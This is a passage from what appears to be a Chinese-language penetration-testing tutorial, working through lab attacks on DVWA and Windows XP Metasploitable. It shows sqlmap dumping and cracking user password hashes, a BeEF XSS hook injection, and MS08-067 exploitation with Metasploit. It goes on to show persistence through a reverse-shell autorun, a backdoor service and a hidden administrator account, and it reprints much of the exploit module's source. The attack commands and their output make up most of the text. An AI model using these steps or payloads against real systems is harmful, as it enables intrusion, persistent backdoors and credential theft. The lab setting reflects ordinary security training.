[1] default dictionary file 'C:\sqlmap\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>

[21:58:04] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]

[21:58:05] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[21:58:05] [INFO] starting 8 processes
[' for hash '21:58:11e99a18c428cb38d5f260853678922e03] ['
[21:58:1321:58:13] [] [INFOINFO] cracked password '] current status: BCfNi... /charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[21:58:16] [INFO] cracked password 'admin' for hash '21232f297a57a5a743894a0e4a801fc3'
['NFO21:58:17] cracked password '] [INFOletmein] current status: bab12... -' for hash '0d107d09f5bbe40cade3de5c71e9e9b7
[password21:58:19' for hash '] [5f4dcc3b5aa765d61d8327deb882cf99INFO'
Database: dvwa
Table: users
[5 entries]
+---------+---------+-------------------------------------------------+---------------------------------------------+-----------+------------+
| user_id | user    | avatar                                          | password                                    | last_name | first_name |
+---------+---------+-------------------------------------------------+---------------------------------------------+-----------+------------+
| 1       | admin   | http://owaspbwa/dvwa/hackable/users/admin.jpg   | 21232f297a57a5a743894a0e4a801fc3 (admin)    | admin     | admin      |
| 2       | gordonb | http://owaspbwa/dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     |
| 3       | 1337    | http://owaspbwa/dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       |
| 4       | pablo   | http://owaspbwa/dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      |
| 5       | smithy  | http://owaspbwa/dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        |
+---------+---------+-------------------------------------------------+---------------------------------------------+-----------+------------+

[21:58:30] [INFO] table 'dvwa.users' dumped to CSV file 'C:\Users\IDEA\AppData\Local\sqlmap\output\10.10.10.129\dump\dvwa\users.csv'
[21:58:30] [INFO] fetched data logged to text files under 'C:\Users\IDEA\AppData\Local\sqlmap\output\10.10.10.129'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91

跨站脚本攻击

XSSF已经停止维护，使用Beef-XSS

https://github.com/beefproject/beef/

启动Kali Linux安装Beef-XSS

cd /etc/
1

git clone https://github.com/beefproject/beef.git
1

cd beef
1

./install
1

启动Beef

./beef
1

提示默认用户名和口令需要修改

root@DESKTOP-9I2FBB4:/etc/beef# ./beef
[22:52:19][!] ERROR: Default username and password in use!
[22:52:19]    |_  Change the beef.credentials.passwd in config.yaml
1
2
3

vi config.yaml
1

# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file

beef:
    version: '0.5.4.0'
    # More verbose messages (server-side)
    debug: false
    # More verbose messages (client-side)
    client_debug: false
    # Used for generating secure tokens
    crypto_default_value_length: 80

    # Credentials to authenticate in BeEF.
    # Used by both the RESTful API and the Admin interface
    credentials:
        user:   "beef"
        passwd: "beef"

    # Interface / IP restrictions
    restrictions:
        # subnet of IP addresses that can hook to the framework
        permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
        # subnet of IP addresses that can connect to the admin UI
        #permitted_ui_subnet: ["127.0.0.1/32", "::1/128"]
        permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
        # subnet of IP addresses that cannot be hooked by the framework
        excluded_hooking_subnet: []
        # slow API calls to 1 every  api_attempt_delay  seconds
        api_attempt_delay: "0.05"

    # HTTP server
    http:
        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
        host: "0.0.0.0"
        port: "3000"

        # Decrease this setting to 1,000 (ms) if you want more responsiveness
        #  when sending modules and retrieving results.
        # NOTE: A poll timeout of less than 5,000 (ms) might impact performance
        #  when hooking lots of browsers (50+).
        # Enabling WebSockets is generally better (beef.websocket.enable)
        xhr_poll_timeout: 1000

        # Host Name / Domain Name
        # If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
        # These settings will be used to create a public facing URL
        # This public facing URL will be used for all hook related calls
        # set the public setting below:
        # public:
        #     host: "" # public hostname/IP address
        #     port: "" # public port will default to 80 if no https 443 if https
                      # and local if not set but there is a public host
        #     https: false # true/false

        # Reverse Proxy / NAT
        # If you want BeEF to be accessible behind a reverse proxy or NAT,
        #   set both the publicly accessible hostname/IP address and port below:
        # NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
        #   by altering the X-FORWARDED-FOR ip address in the request header.
        allow_reverse_proxy: false

        # Hook
        hook_file: "/hook.js"
        hook_session_name: "BEEFHOOK"

        # Allow one or multiple origins to access the RESTful API using CORS
        # For multiple origins use: "http://browserhacker.com, http://domain2.com"
        restful_api:
            allow_cors: false
            cors_allowed_domains: "http://browserhacker.com"

        # Prefer WebSockets over XHR-polling when possible.
        websocket:
            enable: false
            port: 61985 # WS: good success rate through proxies
            # Use encrypted 'WebSocketSecure'
            # NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
            secure: true
            secure_port: 61986 # WSSecure
            ws_poll_timeout: 5000 # poll BeEF every x second, this affects how often the browser can have a command exec
ute on it
            ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel

        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
        web_server_imitation:
            enable: true
            type: "apache" # Supported: apache, iis, nginx
            hook_404: false # inject BeEF hook in HTTP 404 responses
            hook_root: false # inject BeEF hook in the server home page
        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
        https:
            enable: false
            # Enabled this config setting if you're external facing uri is using https
            public_enabled: false
            # In production environments, be sure to use a valid certificate signed for the value
            # used in beef.http.public (the domain name of the server where you run BeEF)
            key: "beef_key.pem"
            cert: "beef_cert.pem"

    database:
        file: "beef.db"

    # Autorun Rule Engine
    autorun:
        # this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterva
l
        # to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or event
ually
        # continue execution regardless of results.
        # If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase th
e timeout.
        result_poll_interval: 300
        result_poll_timeout: 5000

        # If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
        # This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
        continue_after_timeout: true

    # Enables DNS lookups on zombie IP addresses
    dns_hostname_lookup: false

    # IP Geolocation
    geoip:
        enable: true
        # GeoLite2 City database created by MaxMind, available from https://www.maxmind.com
        database: '/usr/share/GeoIP/GeoLite2-City.mmdb'

    # Integration with PhishingFrenzy
    # If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
    # to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
    integration:
        phishing_frenzy:
            enable: false

    # You may override default extension configuration parameters here
    # Note: additional experimental extensions are available in the 'extensions' directory
    #       and can be enabled via their respective 'config.yaml' file
    extension:
        admin_ui:
            enable: true
            base_path: "/ui"
        demos:
            enable: true
        events:
            enable: true
        evasion:
            enable: false
        requester:
            enable: true
        proxy:
            enable: true
        network:
            enable: true
        metasploit:
            enable: false
        social_engineering:
            enable: true
        xssrays:
            enable: true
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162

修改user和password后启动Beef

./beef
1

提示信息先标记一下

[22:56:06][*] running on network interface: 10.10.10.128
[22:56:06]    |   Hook URL: http://10.10.10.128:3000/hook.js
[22:56:06]    |_  UI URL:   http://10.10.10.128:3000/ui/panel
[22:56:06][*] RESTful API key: b2400041e8e3f03c5ee4adcf8ca5cb5e620edd04
[22:56:06][!] [GeoIP] Could not find MaxMind GeoIP database: '/usr/share/GeoIP/GeoLite2-City.mmdb'
[22:56:06][*] HTTP Proxy: http://127.0.0.1:6789
[22:56:06][*] BeEF server started (press control+c to stop)
1
2
3
4
5
6
7

里面含有hook信息

Hook URL: http://10.10.10.128:3000/hook.js
1

因此构造的javascript脚本应为

<script src="http://10.10.10.128:3000/hook.js"></script>
1

访问Beef控制台

http://127.0.0.1:3000/ui/panel
1

设置DVWA Security为Low后选择XSS reflected，输入javascript代码点击Submit
能够看到主机信息
其中Location根据报错信息需要GeoIP，可在我的资源中下载

[22:56:06][!] [GeoIP] Could not find MaxMind GeoIP database: '/usr/share/GeoIP/GeoLite2-City.mmdb'
1

备注：跨站脚本攻击在互联网上攻击需要有互联网IP地址

网络服务渗透

MS08067

search ms08_067
1

msf6 > search ms08_067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
1
2
3
4
5
6
7
8
9
10
11

use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.10.128
set LPORT 5000
set LHOST 10.10.10.128
set target 7
exploit
1
2
3
4
5
6
7

msf6 exploit(windows/smb/ms08_067_netapi) > exploit

[*] 192.168.10.128:445 - Attempting to trigger the vulnerability...
[*] Started bind TCP handler against 192.168.10.128:5000
[*] Sending stage (175174 bytes) to 192.168.10.128
[*] Meterpreter session 1 opened (192.168.10.1:2231 -> 192.168.10.128:5000 ) at 2022-04-16 11:42:28 +0800

meterpreter > sysinfo
Computer        : DH-CA8822AB9589
OS              : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

添加开机启动项，当开机时连接攻击主机10.10.10.128的443端口

run persistence -X -i 5 -p 443 -r 10.10.10.128
1

meterpreter > run persistence -X -i 5 -p 443 -r 10.10.10.128

[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at C:/Users/IDEA/.msf4/logs/persistence/DH-CA8822AB9589_20220417.5804/DH-CA8822AB9589_20220417.5804.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=443
[*] Persistent agent script is 99622 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\GbwkRkc.vbs
[*] Executing script C:\WINDOWS\TEMP\GbwkRkc.vbs
[+] Agent executed with PID 4044
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MNeInNfOCaA
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MNeInNfOCaA
1
2
3
4
5
6
7
8
9
10
11
12
13

当攻击目标重启后可从已有后门连接已攻击完成主机

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set LHOST 10.10.10.128
set LPORT 443
exploit
1
2
3
4
5

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > exploit

[*] Started bind TCP handler against :443
1
2
3
4
5
6
7
8
9
10

使用metsvc将Meterpreter以系统服务的形式安装到目标主机

run metsvc
1

meterpreter > run metsvc

[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\WINDOWS\TEMP\uIaJuExSqtDr...
[*]  >> Uploading metsrv.x86.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
         * Installing service metsvc
 * Starting service
Service metsvc successfully installed.

meterpreter >
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

开启目标主机远程桌面并添加用户账户

run post/windows/manage/enable_rdp
1

meterpreter > run post/windows/manage/enable_rdp

[*] Enabling Remote Desktop
[*]     RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*]     The Terminal Services service is not set to auto, changing it to auto ...
[*]     Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: C:/Users/IDEA/.msf4/loot/20220417153219_default_192.168.10.128_host.windows.cle_582283.txt
1
2
3
4
5
6
7
8

在WinXP Metasploitable中可以看到远程桌面已开启

run getgui -u metasploit -p meterpreter
1

meterpreter > run getgui -u metasploit -p meterpreter

[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Setting user account for logon
[*]     Adding User: metasploit with Password: meterpreter
[*]     Hiding user from Windows Login screen
[*]     Adding User: metasploit to local group 'Remote Desktop Users'
[*]     Adding User: metasploit to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup use command: run multi_console_command -r C:/Users/IDEA/.msf4/logs/scripts/getgui/clean_up__20220417.1259.rc
1
2
3
4
5
6
7
8
9
10
11
12
13

在WinXP Metasploitable中可以看到添加的用户情况



获取权限

getsystem
1

查看当前权限

getuid
1

system权限是系统的最高权限

提示信息，在操作完成后，执行C:/Users/IDEA/.msf4/logs/scripts/getgui/clean_up__20220417.1259.rc清除痕迹，关闭痕迹和删除添加的账号

[*] For cleanup use command: run multi_console_command -r C:/Users/IDEA/.msf4/logs/scripts/getgui/clean_up__20220417.1259.rc
1

run multi_console_command -r C:/Users/IDEA/.msf4/logs/scripts/getgui/clean_up__20220417.1737.rc
1

meterpreter > run multi_console_command -r C:/Users/IDEA/.msf4/logs/scripts/getgui/clean_up__20220417.1737.rc
[*] Running Command List ...
[*]     Running command execute -H -f cmd.exe -a "/c net user metasploit /delete"
Process 2956 created.
[*]     Running command reg deleteval -k HKLM\\SOFTWARE\\Microsoft\\Windows\ NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList -v metasploit
Successfully deleted metasploit.
1
2
3
4
5
6

刷新用户，在WinXP Metasploitable中可以看到添加的用户现已消失
提示信息，在操作完成后，执行C:/Users/IDEA/.msf4/loot/20220417153219_default_192.168.10.128_host.windows.cle_582283.txt清除痕迹，关闭远程桌面

[*] For cleanup execute Meterpreter resource file: C:/Users/IDEA/.msf4/loot/20220417153219_default_192.168.10.128_host.windows.cle_582283.txt
1

run multi_console_command -r C:/Users/IDEA/.msf4/loot/20220417153219_default_192.168.10.128_host.windows.cle_582283.txt
1

meterpreter > run multi_console_command -r C:/Users/IDEA/.msf4/loot/20220417153219_default_192.168.10.128_host.windows.cle_582283.txt
[*] Running Command List ...
[*]     Running command reg setval -k 'HKLM\System\CurrentControlSet\Control\Terminal Server' -v 'fDenyTSConnections' -d "1"
Successfully set fDenyTSConnections of REG_SZ.
[*]     Running command execute -H -f cmd.exe -a "/c sc config termservice start= disabled"
Process 3264 created.
[*]     Running command execute -H -f cmd.exe -a "/c sc stop termservice"
Process 2880 created.
[*]     Running command execute -H -f cmd.exe -a "/c 'netsh firewall set service type = remotedesktop mode = enable'"
Process 3180 created.
1
2
3
4
5
6
7
8
9
10

在WinXP Metasploitable中可以看到远程桌面已关闭

查看MS08067源代码

exploit/windows/smb/ms08_067_netapi
1

C:\metasploit-framework\embedded\framework\modules\exploits\windows\smb\ms08_067_netapi.rb
1

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MS08-067 Microsoft Server Service Relative Path Stack Corruption',
      'Description'    => %q{
          This module exploits a parsing flaw in the path canonicalization code of
        NetAPI32.dll through the Server Service. This module is capable of bypassing
        NX on some operating systems and service packs. The correct target must be
        used to prevent the Server Service (along with a dozen others in the same
        process) from crashing. Windows XP targets seem to handle multiple successful
        exploitation events, but 2003 targets will often crash or hang on subsequent
        attempts. This is just the first version of this module, full support for
        NX bypass on 2003, along with other platforms, is still in development.
      },
      'Author'         =>
        [
          'hdm', # with tons of input/help/testing from the community
          'Brett Moore <brett.moore[at]insomniasec.com>',
          'frank2 <frank2[at]dc949.org>', # check() detection
          'jduck', # XP SP2/SP3 AlwaysOn DEP bypass
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          %w(CVE 2008-4250),
          %w(OSVDB 49243),
          %w(MSB MS08-067),
          # If this vulnerability is found, ms08-67 is exposed as well
          ['URL', 'http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 408,
          'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40",
          'Prepend'  => "\x81\xE4\xF0\xFF\xFF\xFF", # stack alignment
          'StackAdjustment' => -3500,

        },
      'Platform'       => 'win',
      'DefaultTarget'  => 0,
      'Targets'        =>
        [
          #
          # Automatic targetting via fingerprinting
          #
          ['Automatic Targeting', { 'auto' => true }],

          #
          # UNIVERSAL TARGETS
          #

          #
          # Antoine's universal for Windows 2000
          # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
          #
          ['Windows 2000 Universal',
           {
             'Ret'       => 0x001f1cb0,
             'Scratch'   => 0x00020408,
           }
          ], # JMP EDI SVCHOST.EXE

          #
          # Standard return-to-ESI without NX bypass
          # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
          #
          ['Windows XP SP0/SP1 Universal',
           {
             'Ret'       => 0x01001361,
             'Scratch'   => 0x00020408,
           }
          ], # JMP ESI SVCHOST.EXE

          # Standard return-to-ESI without NX bypass
          ['Windows 2003 SP0 Universal',
           {
             'Ret'       => 0x0100129e,
             'Scratch'   => 0x00020408,
           }
          ], # JMP ESI SVCHOST.EXE

          #
          # ENGLISH TARGETS
          #

          # jduck's AlwaysOn NX Bypass for XP SP2
          ['Windows XP SP2 English (AlwaysOn NX)',
           {
             # No pivot is needed, we drop into our rop
             'Scratch' => 0x00020408,
             'UseROP'  => '5.1.2600.2180'
           }
          ],

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 English (NX)',
           {
             'Ret'       => 0x6f88f727,
             'DisableNX' => 0x6f8916e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # jduck's AlwaysOn NX Bypass for XP SP3
          ['Windows XP SP3 English (AlwaysOn NX)',
           {
             # No pivot is needed, we drop into our rop
             'Scratch' => 0x00020408,
             'UseROP'  => '5.1.2600.5512'
           }
          ],

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 English (NX)',
           {
             'Ret'       => 0x6f88f807,
             'DisableNX' => 0x6f8917c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          #
          # NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED
          #

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Arabic (NX)',
           {
             'Ret'       => 0x6fd8f727,
             'DisableNX' => 0x6fd916e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Chinese - Traditional / Taiwan (NX)',
           {
             'Ret'       => 0x5860f727,
             'DisableNX' => 0x586116e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Chinese - Simplified (NX)',
           {
             'Ret'       => 0x58fbf727,
             'DisableNX' => 0x58fc16e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Chinese - Traditional (NX)',
           {
             'Ret'       => 0x5860f727,
             'DisableNX' => 0x586116e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Czech (NX)',
           {
             'Ret'       => 0x6fe1f727,
             'DisableNX' => 0x6fe216e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Danish (NX)',
           {
             'Ret'       => 0x5978f727,
             'DisableNX' => 0x597916e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 German (NX)',
           {
             'Ret'       => 0x6fd9f727,
             'DisableNX' => 0x6fda16e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Greek (NX)',
           {
             'Ret'       => 0x592af727,
             'DisableNX' => 0x592b16e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Spanish (NX)',
           {
             'Ret'       => 0x6fdbf727,
             'DisableNX' => 0x6fdc16e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Finnish (NX)',
           {
             'Ret'       => 0x597df727,
             'DisableNX' => 0x597e16e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 French (NX)',
           {
             'Ret'       => 0x595bf727,
             'DisableNX' => 0x595c16e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Hebrew (NX)',
           {
             'Ret'       => 0x5940f727,
             'DisableNX' => 0x594116e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Hungarian (NX)',
           {
             'Ret'       => 0x5970f727,
             'DisableNX' => 0x597116e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Italian (NX)',
           {
             'Ret'       => 0x596bf727,
             'DisableNX' => 0x596c16e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Japanese (NX)',
           {
             'Ret'       => 0x567fd3be,
             'DisableNX' => 0x568016e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Korean (NX)',
           {
             'Ret'       => 0x6fd6f727,
             'DisableNX' => 0x6fd716e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Dutch (NX)',
           {
             'Ret'       => 0x596cf727,
             'DisableNX' => 0x596d16e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Norwegian (NX)',
           {
             'Ret'       => 0x597cf727,
             'DisableNX' => 0x597d16e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Polish (NX)',
           {
             'Ret'       => 0x5941f727,
             'DisableNX' => 0x594216e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Portuguese - Brazilian (NX)',
           {
             'Ret'       => 0x596ff727,
             'DisableNX' => 0x597016e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Portuguese (NX)',
           {
             'Ret'       => 0x596bf727,
             'DisableNX' => 0x596c16e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Russian (NX)',
           {
             'Ret'       => 0x6fe1f727,
             'DisableNX' => 0x6fe216e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Swedish (NX)',
           {
             'Ret'       => 0x597af727,
             'DisableNX' => 0x597b16e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Turkish (NX)',
           {
             'Ret'       => 0x5a78f727,
             'DisableNX' => 0x5a7916e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Arabic (NX)',
           {
             'Ret'       => 0x6fd8f807,
             'DisableNX' => 0x6fd917c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Chinese - Traditional / Taiwan (NX)',
           {
             'Ret'       => 0x5860f807,
             'DisableNX' => 0x586117c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Chinese - Simplified (NX)',
           {
             'Ret'       => 0x58fbf807,
             'DisableNX' => 0x58fc17c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Chinese - Traditional (NX)',
           {
             'Ret'       => 0x5860f807,
             'DisableNX' => 0x586117c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Czech (NX)',
           {
             'Ret'       => 0x6fe1f807,
             'DisableNX' => 0x6fe217c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Danish (NX)',
           {
             'Ret'       => 0x5978f807,
             'DisableNX' => 0x597917c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 German (NX)',
           {
             'Ret'       => 0x6fd9f807,
             'DisableNX' => 0x6fda17c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Greek (NX)',
           {
             'Ret'       => 0x592af807,
             'DisableNX' => 0x592b17c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

